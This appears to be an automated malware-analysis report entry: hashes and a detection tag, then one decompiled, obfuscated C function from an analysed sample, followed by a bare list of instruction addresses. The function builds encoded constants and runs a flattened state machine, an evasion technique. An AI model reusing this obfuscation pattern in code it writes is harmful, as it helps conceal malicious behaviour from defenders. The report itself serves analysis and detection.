Instruction ID: 7d2c4f96e38ed4c006f5ac85561b0a34e8db1bc6f375092c3ccda5903e7eca5c
Opcode Fuzzy Hash: 50ff99ee67353e9cd94fafb72e4cfd785924bdb8a2cd0e470ddc03ac971eab97
Instruction Fuzzy Hash: E11269719006299BDB64DF54CC80ADAB3B9FF49704F1442D9E509A7261DB30EEC5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0104AC95, Relevance: 23.2, Strings: 18, Instructions: 685
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E0104AC95(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, signed int _a48) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _t800;
				signed int* _t818;
				signed int _t819;
				signed int _t822;
				void* _t829;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				void* _t842;
				signed int _t843;
				signed int _t858;
				void* _t897;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t918;
				signed int* _t924;
				void* _t928;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28 & 0x0000ffff);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E01062523(_a28 & 0x0000ffff);
				_v300 = 0xd1cc29;
				_t924 =  &(( &_v308)[0xe]);
				_v300 = _v300 ^ 0xaa9b9a42;
				_v300 = _v300 ^ 0xaa4a566b;
				_v120 = 0xd766cb;
				_t830 = 0;
				_v120 = _v120 >> 5;
				_t915 = 0x3196c07;
				_v120 = _v120 + 0xffffc2b8;
				_v120 = _v120 ^ 0x00067dfd;
				_v232 = 0x851d10;
				_v232 = _v232 >> 4;
				_v232 = _v232 | 0x68ff3af1;
				_v232 = _v232 + 0xa41e;
				_v232 = _v232 ^ 0x690020c7;
				_v64 = 0x5b203f;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00008b64;
				_v164 = 0x63d511;
				_v164 = _v164 + 0xffffee15;
				_v8 = 0;
				_t913 = 0x4f;
				_v164 = _v164 / _t913;
				_v164 = _v164 ^ 0x00010347;
				_v140 = 0x5208f;
				_v140 = _v140 + 0xffff4186;
				_v140 = _v140 | 0xcae24784;
				_v140 = _v140 ^ 0xcaa66795;
				_v12 = 0xcd4b66;
				_v12 = _v12 + 0xffffb2fc;
				_v12 = _v12 ^ 0x00c8fe62;
				_v172 = 0x1431ee;
				_v172 = _v172 ^ 0xe76300a3;
				_v172 = _v172 >> 9;
				_v172 = _v172 ^ 0x0473bb98;
				_v72 = 0x2a024b;
				_v72 = _v72 + 0xc1b7;
				_v72 = _v72 ^ 0x0022c402;
				_v116 = 0x1a249a;
				_v116 = _v116 | 0x94501829;
				_v116 = _v116 << 0xe;
				_v116 = _v116 ^ 0x8f2ec200;
				_v292 = 0x42fdbe;
				_v292 = _v292 + 0x9503;
				_v292 = _v292 + 0xffff48ca;
				_v292 = _v292 >> 2;
				_v292 = _v292 ^ 0x0010b7e2;
				_v40 = 0x1c76ed;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x0edda000;
				_v204 = 0xdf72f6;
				_v204 = _v204 ^ 0x99836ccc;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x02657078;
				_v256 = 0x7f2be8;
				_v256 = _v256 + 0x8074;
				_v256 = _v256 << 0xb;
				_v256 = _v256 + 0xf869;
				_v256 = _v256 ^ 0xfd63d828;
				_v84 = 0x77dab9;
				_v84 = _v84 | 0x79e4a371;
				_v84 = _v84 ^ 0x79f7fbe6;
				_v68 = 0xc3d915;
				_v68 = _v68 | 0x94a8eb56;
				_v68 = _v68 ^ 0x94ebfb48;
				_v132 = 0x2f5086;
				_v132 = _v132 + 0xffffb583;
				_v132 = _v132 << 6;
				_v132 = _v132 ^ 0x0bc18243;
				_v76 = 0x1fabb3;
				_v76 = _v76 ^ 0x5273c57e;
				_v76 = _v76 ^ 0x526c6fcd;
				_v300 = 0x8e8c49;
				_v300 = _v300 << 0xf;
				_v300 = _v300 ^ 0x46278df7;
				_v300 = 0x8ee475;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x011c9f5b;
				_v304 = 0x7259a2;
				_v304 = _v304 | 0x64804cb6;
				_v304 = _v304 + 0xffffd1cb;
				_v304 = _v304 ^ 0x64f1a62d;
				_v308 = 0x85033;
				_v308 = _v308 >> 1;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x6790e852;
				_v308 = _v308 ^ 0x67933f0e;
				_v304 = 0xb400a4;
				_v304 = _v304 * 0x5f;
				_v304 = _v304 >> 1;
				_v304 = _v304 ^ 0x21614ee0;
				_v300 = 0x4fe69a;
				_v300 = _v300 << 0xa;
				_v300 = _v300 ^ 0x3f941466;
				_v308 = 0xceb94b;
				_v308 = _v308 ^ 0x8a35815d;
				_v308 = _v308 << 2;
				_v308 = _v308 + 0xffff3b89;
				_v308 = _v308 ^ 0x2be914c6;
				_v308 = 0x72b949;
				_v308 = _v308 * 0x5f;
				_v308 = _v308 + 0x856b;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x02aa6435;
				_v308 = 0x3855ef;
				_v308 = _v308 ^ 0xc26dcfeb;
				_v308 = _v308 >> 9;
				_v308 = _v308 + 0xf615;
				_v308 = _v308 ^ 0x006d0aa6;
				_v304 = 0xf05db3;
				_v304 = _v304 ^ 0xdd1eaeb3;
				_v304 = _v304 | 0xcd57129b;
				_v304 = _v304 ^ 0xddf9e192;
				_v304 = 0xe5d59f;
				_v304 = _v304 >> 3;
				_v304 = _v304 | 0xd82d12eb;
				_v304 = _v304 ^ 0xd830880e;
				_v308 = 0xf96c58;
				_v308 = _v308 ^ 0xcd497794;
				_v308 = _v308 >> 8;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x6c0878ec;
				_v112 = 0x549d76;
				_v112 = _v112 | 0xd7795fbc;
				_v112 = _v112 ^ 0x87f0a508;
				_v112 = _v112 ^ 0x50826402;
				_v216 = 0x3f0678;
				_v216 = _v216 + 0x24e9;
				_v216 = _v216 | 0xe5268454;
				_v216 = _v216 >> 4;
				_v216 = _v216 ^ 0x0e538ef0;
				_v224 = 0x2c235d;
				_t239 =  &_v224; // 0x2c235d
				_t832 = 0x54;
				_v224 =  *_t239 / _t832;
				_v224 = _v224 + 0x4b47;
				_v224 = _v224 ^ 0xdeaa23a4;
				_v224 = _v224 ^ 0xdea66806;
				_v108 = 0x63b50d;
				_t833 = 0x75;
				_v108 = _v108 * 0x45;
				_v108 = _v108 ^ 0x1ada951f;
				_v128 = 0x429af;
				_v128 = _v128 / _t833;
				_v128 = _v128 + 0xffff20f8;
				_v128 = _v128 ^ 0xfff26b7c;
				_v16 = 0xcf37d;
				_v16 = _v16 ^ 0xf47dc5d0;
				_v16 = _v16 ^ 0xf47387c1;
				_v196 = 0x7ce77a;
				_v196 = _v196 << 3;
				_v196 = _v196 >> 9;
				_v196 = _v196 ^ 0x00028fc4;
				_v156 = 0x3f887d;
				_v156 = _v156 | 0xf44bd7f3;
				_v156 = _v156 + 0xffff0258;
				_v156 = _v156 ^ 0xf47739ea;
				_v188 = 0x63e935;
				_v188 = _v188 >> 8;
				_v188 = _v188 + 0xffff2425;
				_v188 = _v188 ^ 0xfff73234;
				_v24 = 0x175bba;
				_v24 = _v24 + 0xffffef28;
				_v24 = _v24 ^ 0x00116fa0;
				_v228 = 0x14bf2b;
				_v228 = _v228 ^ 0x9f98aa1b;
				_v228 = _v228 ^ 0xb7a6a3cc;
				_v228 = _v228 ^ 0xda4e4d24;
				_v228 = _v228 ^ 0xf26fd88a;
				_v268 = 0x9ceccb;
				_v268 = _v268 << 0xa;
				_v268 = _v268 + 0xffff08d0;
				_v268 = _v268 * 0x72;
				_v268 = _v268 ^ 0x8554b22a;
				_v88 = 0x5dbfb9;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x00272228;
				_v244 = 0xfbde6e;
				_v244 = _v244 + 0x5af4;
				_v244 = _v244 + 0xffff3210;
				_v244 = _v244 << 6;
				_v244 = _v244 ^ 0x3ed0ab12;
				_v180 = 0x963ad7;
				_v180 = _v180 ^ 0x7886baab;
				_v180 = _v180 + 0xffff09c9;
				_v180 = _v180 ^ 0x780d68b8;
				_v80 = 0x9e10b0;
				_v80 = _v80 | 0xae2b0e0b;
				_v80 = _v80 ^ 0xaeb5bcb2;
				_v148 = 0x7be7e6;
				_v148 = _v148 << 8;
				_v148 = _v148 | 0x0142ad06;
				_v148 = _v148 ^ 0x7be85494;
				_v280 = 0x367665;
				_v280 = _v280 | 0xfffff67f;
				_v280 = _v280 ^ 0xfff2e53f;
				_v212 = 0xf72381;
				_v212 = _v212 + 0xffff2e4f;
				_v212 = _v212 + 0xffff7b98;
				_v212 = _v212 ^ 0x00f0d936;
				_v208 = 0x723ec;
				_v208 = _v208 | 0xe2e26793;
				_v208 = _v208 * 0x65;
				_v208 = _v208 ^ 0x8545d83d;
				_v124 = 0x1deff5;
				_v124 = _v124 + 0xffffaa6b;
				_v124 = _v124 | 0x9135d2e0;
				_v124 = _v124 ^ 0x91314ff1;
				_v288 = 0x86787e;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x319a621a;
				_t834 = 0x4c;
				_v288 = _v288 / _t834;
				_v288 = _v288 ^ 0x00b47538;
				_v252 = 0x89e0e5;
				_t835 = 0x2c;
				_v252 = _v252 * 0x4f;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 ^ 0x178b4366;
				_v252 = _v252 ^ 0x1787f403;
				_v32 = 0xfdee53;
				_v32 = _v32 ^ 0x2185366e;
				_v32 = _v32 ^ 0x2170250f;
				_v236 = 0x55fc8a;
				_v236 = _v236 + 0x15cc;
				_v236 = _v236 * 0x54;
				_v236 = _v236 * 0x6d;
				_v236 = _v236 ^ 0x066e90b6;
				_v104 = 0xfda392;
				_v104 = _v104 ^ 0x79c4e352;
				_v104 = _v104 ^ 0x793a8fcb;
				_v56 = 0xc91cce;
				_v56 = _v56 + 0xfffff402;
				_v56 = _v56 ^ 0x00c263ba;
				_v272 = 0x5a59b6;
				_v272 = _v272 + 0xffffb917;
				_v272 = _v272 * 0x69;
				_v272 = _v272 << 2;
				_v272 = _v272 ^ 0x93c354db;
				_v184 = 0x8fd0ca;
				_v184 = _v184 + 0xffffa535;
				_v184 = _v184 | 0xf05f6e95;
				_v184 = _v184 ^ 0xf0d33a82;
				_v192 = 0xd967c8;
				_v192 = _v192 / _t835;
				_v192 = _v192 | 0x096317b5;
				_v192 = _v192 ^ 0x09603d64;
				_v100 = 0xae60c5;
				_t836 = 0x4b;
				_v100 = _v100 * 0x39;
				_v100 = _v100 ^ 0x26d44587;
				_v264 = 0x13ecdf;
				_v264 = _v264 / _t836;
				_t837 = 7;
				_v264 = _v264 * 0xa;
				_v264 = _v264 + 0xffff2839;
				_v264 = _v264 ^ 0x000caae0;
				_v168 = 0xe37d7f;
				_v168 = _v168 / _t837;
				_v168 = _v168 | 0x3074f611;
				_v168 = _v168 ^ 0x307de6eb;
				_v92 = 0xe11ed;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x0001b24f;
				_v176 = 0x3811fc;
				_v176 = _v176 + 0x9eb8;
				_v176 = _v176 + 0xffffeb15;
				_v176 = _v176 ^ 0x0034f958;
				_v152 = 0x751569;
				_v152 = _v152 ^ 0xf1367d03;
				_t838 = 0x2a;
				_v152 = _v152 / _t838;
				_v152 = _v152 ^ 0x05b938f5;
				_v160 = 0x826d3e;
				_v160 = _v160 + 0xffff0d45;
				_v160 = _v160 << 9;
				_v160 = _v160 ^ 0x02f1c982;
				_v308 = 0x615de7;
				_t508 =  &_v308; // 0x615de7
				_t839 = 0x32;
				_v308 =  *_t508 * 0x5b;
				_v308 = _v308 + 0xffff0e3a;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x000176ef;
				_v248 = 0x940bff;
				_v248 = _v248 / _t839;
				_v248 = _v248 | 0xf3f710e4;
				_v248 = _v248 / _t839;
				_v248 = _v248 ^ 0x04ec6dcd;
				_v48 = 0xcfc725;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 ^ 0x00010a74;
				_v96 = 0x365da7;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x0002081b;
				_v276 = 0x225d96;
				_v276 = _v276 + 0x2c1;
				_v276 = _v276 / _t913;
				_v276 = _v276 << 6;
				_v276 = _v276 ^ 0x001c07fc;
				_v220 = 0x39c1d0;
				_v220 = _v220 ^ 0x8168a0f4;
				_v220 = _v220 << 3;
				_v220 = _v220 << 0xc;
				_v220 = _v220 ^ 0xb09df3c0;
				_v284 = 0xf9c0bb;
				_v284 = _v284 >> 0xe;
				_v284 = _v284 + 0x14c0;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0x000b4193;
				_v20 = 0xc3fb9a;
				_v20 = _v20 + 0x8d16;
				_v20 = _v20 ^ 0x00ccf36e;
				_v240 = 0x8c9adc;
				_v240 = _v240 ^ 0x888f7960;
				_v240 = _v240 + 0xffff62bf;
				_v240 = _v240 + 0xffff86c4;
				_v240 = _v240 ^ 0x880c37e1;
				_v200 = 0xd9fcf3;
				_v200 = _v200 << 4;
				_v200 = _v200 ^ 0xd6e38aec;
				_v200 = _v200 ^ 0xdb711a2e;
				_v260 = 0x11f115;
				_t840 = 0x53;
				_v260 = _v260 / _t840;
				_v260 = _v260 >> 8;
				_v260 = _v260 ^ 0xde7704a7;
				_v260 = _v260 ^ 0xde7b5856;
				_v304 = 0x1851cb;
				_v304 = _v304 ^ 0x0d0756f7;
				_v304 = _v304 + 0x1e91;
				_v304 = _v304 ^ 0x0d150a0a;
				_v136 = 0xc7edb3;
				_v136 = _v136 + 0xffff3700;
				_v136 = _v136 + 0x6375;
				_v136 = _v136 ^ 0x00cba417;
				_v52 = 0x62e7e0;
				_t623 =  &_v52; // 0x62e7e0
				_t841 = 0x23;
				_v52 =  *_t623 / _t841;
				_v52 = _v52 ^ 0x0001b1ca;
				_v144 = 0x12c825;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 << 1;
				_v144 = _v144 ^ 0x0001096e;
				_v300 = 0xe8ad08;
				_v300 = _v300 + 0xffffda27;
				_v300 = _v300 ^ 0x00e4ab5e;
				_v28 = 0x3c1d14;
				_v28 = _v28 | 0xc4f139e0;
				_v28 = _v28 ^ 0xc4f03139;
				_v36 = 0x5a3c12;
				_v36 = _v36 * 0x5f;
				_v36 = _v36 ^ 0x21715166;
				_v44 = 0x139fe3;
				_v44 = _v44 | 0xc7ef95d4;
				_v44 = _v44 ^ 0xc7f6afb5;
				_t914 = _v4;
				_t922 = _v4;
				while(1) {
					L1:
					_t800 = _v296;
					_t842 = 0xd648990;
					while(1) {
						L2:
						_t897 = 0xffd9902;
						while(1) {
							L3:
							_t928 = _t915 - 0xb64b6f6;
							if(_t928 > 0) {
								goto L19;
							}
							L4:
							if(_t928 == 0) {
								_t818 = _a32;
								_t843 =  *_t818;
								__eflags = _t843;
								if(_t843 == 0) {
									_t819 = 0;
									__eflags = 0;
								} else {
									_t819 = _t818[1];
								}
								E0104A2F6(_t914, _t819, _v48, _v96, _v276, _a44, _t843, _v220, _v284);
								_t924 =  &(_t924[8]);
								asm("sbb esi, esi");
								_t915 = (_t915 & 0x0876ac85) + 0x337366e;
								while(1) {
									L1:
									_t800 = _v296;
									_t842 = 0xd648990;
									goto L2;
								}
							} else {
								if(_t915 == 0x7d36d3) {
									_push(_v128);
									_push(_v204);
									_push(_v108);
									_push(_v224);
									_t822 = E0104F2CC(_v216);
									_t922 = _t822;
									__eflags = _t822;
									_t915 =  !=  ? 0xffd9902 : 0x2d9c50f;
									E01042043(0, _v16, _v196, _v156);
									_t924 = _t924 - 0x10 + 0x28;
									_t842 = 0xd648990;
									_t897 = 0xffd9902;
									goto L37;
								} else {
									if(_t915 == 0x1dc854f) {
										E010454DA(_v300, _v28, _v36, _v44, _t922);
									} else {
										if(_t915 == 0x3196c07) {
											_t915 = 0xb6d7c5f;
											continue;
										} else {
											if(_t915 == 0x337366e) {
												E010454DA(_v20, _v240, _v200, _v260, _t914);
												_t924 =  &(_t924[3]);
												L12:
												_t915 = 0xbb8862e;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											} else {
												if(_t915 != 0x8f009c2) {
													L37:
													__eflags = _t915 - 0x2d9c50f;
													if(_t915 != 0x2d9c50f) {
														_t800 = _v296;
														continue;
													}
												} else {
													E0105F83F(_t914, _a16);
													_t915 = 0x337366e;
													_t829 = 1;
													_t830 =  !=  ? _t829 : _t830;
													while(1) {
														L1:
														_t800 = _v296;
														_t842 = 0xd648990;
														L2:
														_t897 = 0xffd9902;
														while(1) {
															L3:
															_t928 = _t915 - 0xb64b6f6;
															if(_t928 > 0) {
																goto L19;
															}
															goto L4;
														}
														goto L19;
													}
												}
											}
										}
									}
								}
							}
							L40:
							return _t830;
							L41:
							L19:
							__eflags = _t915 - 0xb6d7c5f;
							if(_t915 == 0xb6d7c5f) {
								_t915 = 0x7d36d3;
								goto L37;
							} else {
								__eflags = _t915 - 0xbade2f3;
								if(__eflags == 0) {
									__eflags = E0105BC05(_t914, _v120, __eflags) - _v232;
									_t915 =  ==  ? 0x8f009c2 : 0x337366e;
									goto L1;
								} else {
									__eflags = _t915 - 0xbb8862e;
									if(_t915 == 0xbb8862e) {
										E010454DA(_v304, _v136, _v52, _v144, _t800);
										_t924 =  &(_t924[3]);
										_t915 = 0x1dc854f;
										while(1) {
											L1:
											_t800 = _v296;
											_t842 = 0xd648990;
											goto L2;
										}
									} else {
										__eflags = _t915 - _t842;
										if(_t915 == _t842) {
											__eflags =  *_a32;
											if(__eflags == 0) {
												_t806 = _v8;
											} else {
												_push(_v148);
												_push(0x1041608);
												_v8 = E01043F5C(_v180, _v80, __eflags);
											}
											_t858 = _v40 | _v292 | _v116 | _v72 | _v172 | _v12 | _v140 | _v164 | _v64;
											_t918 = _a48 & 1;
											__eflags = _t918;
											if(_t918 != 0) {
												__eflags = _t858;
											}
											_t914 = E01048A5E(_v280, _v296, _v212, _v208, _v124, _v288, _t858, _t858, _t858, _t858, _t806, _t858, _v252, _v32, _v236, _a4);
											E01060352(_v104, _v56, _v8, _v272);
											_t924 =  &(_t924[0x10]);
											__eflags = _t914;
											if(_t914 == 0) {
												goto L12;
											} else {
												_v60 = 1;
												E010453F7( &_v60, _v256, _v184, 4, _v192, _t914, _v100, _v264);
												_t924 =  &(_t924[6]);
												__eflags = _t918;
												if(_t918 != 0) {
													E010440B0(_v84, _t914, _v168, _v92,  &_v60, _v176,  &_v4);
													_t739 =  &_v60;
													 *_t739 = _v60 | _v76;
													__eflags =  *_t739;
													E010453F7( &_v60, _v68, _v152, _v4, _v160, _t914, _v308, _v248);
													_t924 =  &(_t924[0xb]);
												}
												_t915 = 0xb64b6f6;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											}
											goto L41;
										} else {
											__eflags = _t915 - _t897;
											if(_t915 != _t897) {
												goto L37;
											} else {
												_t800 = E010630FB(_a40, _v188, _v24, _v132, _v228, _t922, _t842, _v268, _v88, _a28, _t842, _v244);
												_t924 =  &(_t924[0xc]);
												_v296 = _t800;
												__eflags = _t800;
												_t842 = 0xd648990;
												_t915 =  !=  ? 0xd648990 : 0x1dc854f;
												goto L2;
											}
										}
									}
								}
							}
							goto L40;
						}
					}
				}
			}

0x0104aca6
0x0104acb0
0x0104acb7
0x0104acbe
0x0104acc5
0x0104accc
0x0104accd
0x0104acd4
0x0104acdb
0x0104ace2
0x0104ace9
0x0104acf0
0x0104acf7
0x0104acf8
0x0104acf9
0x0104acfe
0x0104ad06
0x0104ad09
0x0104ad13
0x0104ad1d
0x0104ad28
0x0104ad2a
0x0104ad32
0x0104ad37
0x0104ad42
0x0104ad4d
0x0104ad55
0x0104ad5a
0x0104ad62
0x0104ad6a
0x0104ad72
0x0104ad7d
0x0104ad85
0x0104ad90
0x0104ad9b
0x0104ada6
0x0104adb6
0x0104adb9
0x0104adc0
0x0104adcb
0x0104add6
0x0104ade1
0x0104adec
0x0104adf7
0x0104ae02
0x0104ae0d
0x0104ae18
0x0104ae23
0x0104ae2e
0x0104ae36
0x0104ae41
0x0104ae4c
0x0104ae57
0x0104ae62
0x0104ae6d
0x0104ae78
0x0104ae80
0x0104ae8b
0x0104ae93
0x0104ae9b
0x0104aea3
0x0104aea8
0x0104aeb0
0x0104aebb
0x0104aec3
0x0104aece
0x0104aed6
0x0104aede
0x0104aee3
0x0104aeeb
0x0104aef3
0x0104aefb
0x0104af00
0x0104af08
0x0104af10
0x0104af1b
0x0104af26
0x0104af31
0x0104af3c
0x0104af47
0x0104af52
0x0104af5d
0x0104af68
0x0104af70
0x0104af7b
0x0104af86
0x0104af91
0x0104af9c
0x0104afa4
0x0104afa9
0x0104afb1
0x0104afb9
0x0104afbd
0x0104afc5
0x0104afcd
0x0104afd5
0x0104afdd
0x0104afe5
0x0104afed
0x0104aff1
0x0104aff6
0x0104affe
0x0104b006
0x0104b013
0x0104b017
0x0104b01b
0x0104b023
0x0104b02b
0x0104b030
0x0104b038
0x0104b040
0x0104b048
0x0104b04d
0x0104b055
0x0104b05d
0x0104b06a
0x0104b06e
0x0104b076
0x0104b07b
0x0104b083
0x0104b08b
0x0104b093
0x0104b098
0x0104b0a0
0x0104b0a8
0x0104b0b0
0x0104b0b8
0x0104b0c0
0x0104b0c8
0x0104b0d0
0x0104b0d5
0x0104b0dd
0x0104b0e5
0x0104b0ed
0x0104b0f5
0x0104b0fa
0x0104b0ff
0x0104b107
0x0104b112
0x0104b11d
0x0104b128
0x0104b133
0x0104b13b
0x0104b143
0x0104b14b
0x0104b150
0x0104b15a
0x0104b162
0x0104b168
0x0104b16d
0x0104b173
0x0104b17b
0x0104b183
0x0104b18b
0x0104b19e
0x0104b19f
0x0104b1a6
0x0104b1b1
0x0104b1c5
0x0104b1cc
0x0104b1d7
0x0104b1e2
0x0104b1ed
0x0104b1f8
0x0104b203
0x0104b20e
0x0104b216
0x0104b21e
0x0104b229
0x0104b234
0x0104b23f
0x0104b24a
0x0104b255
0x0104b260
0x0104b268
0x0104b273
0x0104b27e
0x0104b289
0x0104b294
0x0104b29f
0x0104b2a7
0x0104b2af
0x0104b2b7
0x0104b2bf
0x0104b2c7
0x0104b2cf
0x0104b2d4
0x0104b2e1
0x0104b2e5
0x0104b2ed
0x0104b2f8
0x0104b2ff
0x0104b30a
0x0104b312
0x0104b31a
0x0104b322
0x0104b327
0x0104b32f
0x0104b33a
0x0104b345
0x0104b350
0x0104b35b
0x0104b366
0x0104b371
0x0104b37c
0x0104b387
0x0104b38f
0x0104b39a
0x0104b3a5
0x0104b3ad
0x0104b3b5
0x0104b3bd
0x0104b3c5
0x0104b3cd
0x0104b3d5
0x0104b3dd
0x0104b3e5
0x0104b3f2
0x0104b3f6
0x0104b3fe
0x0104b409
0x0104b416
0x0104b421
0x0104b42c
0x0104b434
0x0104b439
0x0104b447
0x0104b44c
0x0104b452
0x0104b45a
0x0104b467
0x0104b46a
0x0104b46e
0x0104b473
0x0104b47b
0x0104b483
0x0104b48e
0x0104b499
0x0104b4a4
0x0104b4ac
0x0104b4b9
0x0104b4c2
0x0104b4c6
0x0104b4ce
0x0104b4d9
0x0104b4e4
0x0104b4ef
0x0104b4fa
0x0104b505
0x0104b510
0x0104b518
0x0104b525
0x0104b529
0x0104b52e
0x0104b536
0x0104b541
0x0104b54c
0x0104b557
0x0104b562
0x0104b578
0x0104b57f
0x0104b58a
0x0104b595
0x0104b5a8
0x0104b5ab
0x0104b5b2
0x0104b5bd
0x0104b5cd
0x0104b5d6
0x0104b5d7
0x0104b5db
0x0104b5e3
0x0104b5eb
0x0104b5ff
0x0104b606
0x0104b611
0x0104b61c
0x0104b627
0x0104b62f
0x0104b63a
0x0104b647
0x0104b652
0x0104b65d
0x0104b668
0x0104b673
0x0104b687
0x0104b68c
0x0104b693
0x0104b69e
0x0104b6a9
0x0104b6b4
0x0104b6bc
0x0104b6c7
0x0104b6cf
0x0104b6d6
0x0104b6d9
0x0104b6dd
0x0104b6e5
0x0104b6ea
0x0104b6f2
0x0104b702
0x0104b706
0x0104b716
0x0104b71a
0x0104b722
0x0104b72d
0x0104b735
0x0104b740
0x0104b74b
0x0104b753
0x0104b75e
0x0104b766
0x0104b776
0x0104b77a
0x0104b77f
0x0104b787
0x0104b78f
0x0104b797
0x0104b79c
0x0104b7a1
0x0104b7a9
0x0104b7b1
0x0104b7b6
0x0104b7be
0x0104b7c3
0x0104b7cb
0x0104b7d6
0x0104b7e1
0x0104b7ec
0x0104b7f4
0x0104b7fc
0x0104b804
0x0104b80c
0x0104b814
0x0104b81f
0x0104b827
0x0104b832
0x0104b83d
0x0104b849
0x0104b84c
0x0104b850
0x0104b855
0x0104b85d
0x0104b867
0x0104b86f
0x0104b877
0x0104b87f
0x0104b887
0x0104b892
0x0104b89d
0x0104b8a8
0x0104b8b3
0x0104b8be
0x0104b8c7
0x0104b8ca
0x0104b8d1
0x0104b8dc
0x0104b8e7
0x0104b8ef
0x0104b8f6
0x0104b901
0x0104b909
0x0104b911
0x0104b919
0x0104b924
0x0104b92f
0x0104b93a
0x0104b94d
0x0104b954
0x0104b95f
0x0104b96a
0x0104b975
0x0104b980
0x0104b987
0x0104b98e
0x0104b98e
0x0104b98e
0x0104b992
0x0104b997
0x0104b997
0x0104b997
0x0104b99c
0x0104b99c
0x0104b99c
0x0104b9a2
0x00000000
0x00000000
0x0104b9a8
0x0104b9a8
0x0104baa0
0x0104baa7
0x0104baa9
0x0104baab
0x0104bab2
0x0104bab2
0x0104baad
0x0104baad
0x0104baad
0x0104bad9
0x0104bade
0x0104bae3
0x0104baeb
0x0104b98e
0x0104b98e
0x0104b98e
0x0104b992
0x00000000
0x0104b992
0x0104b9ae
0x0104b9b4
0x0104ba2f
0x0104ba39
0x0104ba40
0x0104ba47
0x0104ba5c
0x0104ba68
0x0104ba7d
0x0104ba84
0x0104ba89
0x0104ba8e
0x0104ba91
0x0104ba96
0x00000000
0x0104b9b6
0x0104b9bc
0x0104bdb8
0x0104b9c2
0x0104b9c8
0x0104ba25
0x00000000
0x0104b9ca
0x0104b9d0
0x0104ba13
0x0104ba18
0x0104ba1b
0x0104ba1b
0x0104b98e
0x0104b98e
0x0104b98e
0x0104b992
0x00000000
0x0104b992
0x0104b9d2
0x0104b9d9
0x0104bd8d
0x0104bd8d
0x0104bd93
0x0104bd95
0x00000000
0x0104bd95
0x0104b9df
0x0104b9e8
0x0104b9ef
0x0104b9f6
0x0104b9f7
0x0104b98e
0x0104b98e
0x0104b98e
0x0104b992
0x0104b997
0x0104b997
0x0104b99c
0x0104b99c
0x0104b99c
0x0104b9a2
0x00000000
0x00000000
0x00000000
0x0104b9a2
0x00000000
0x0104b99c
0x0104b98e
0x0104b9d9
0x0104b9d0
0x0104b9c8
0x0104b9bc
0x0104b9b4
0x0104bdc3
0x0104bdcc
0x00000000
0x0104baf6
0x0104baf6
0x0104bafc
0x0104bd88
0x00000000
0x0104bb02
0x0104bb02
0x0104bb08
0x0104bd79
0x0104bd80
0x00000000
0x0104bb0e
0x0104bb0e
0x0104bb14
0x0104bd50
0x0104bd55
0x0104bd58
0x0104b98e
0x0104b98e
0x0104b98e
0x0104b992
0x00000000
0x0104b992
0x0104bb1a
0x0104bb1a
0x0104bb1c
0x0104bb86
0x0104bb89
0x0104bbb5
0x0104bb8b
0x0104bb8b
0x0104bba0
0x0104bbac
0x0104bbac
0x0104bbfb
0x0104bc02
0x0104bc02
0x0104bc04
0x0104bc06
0x0104bc06
0x0104bc59
0x0104bc6a
0x0104bc6f
0x0104bc72
0x0104bc74
0x00000000
0x0104bc7a
0x0104bc97
0x0104bcab
0x0104bcb0
0x0104bcb3
0x0104bcb5
0x0104bce5
0x0104bcfc
0x0104bcfc
0x0104bcfc
0x0104bd24
0x0104bd29
0x0104bd29
0x0104bd2c
0x0104b98e
0x0104b98e
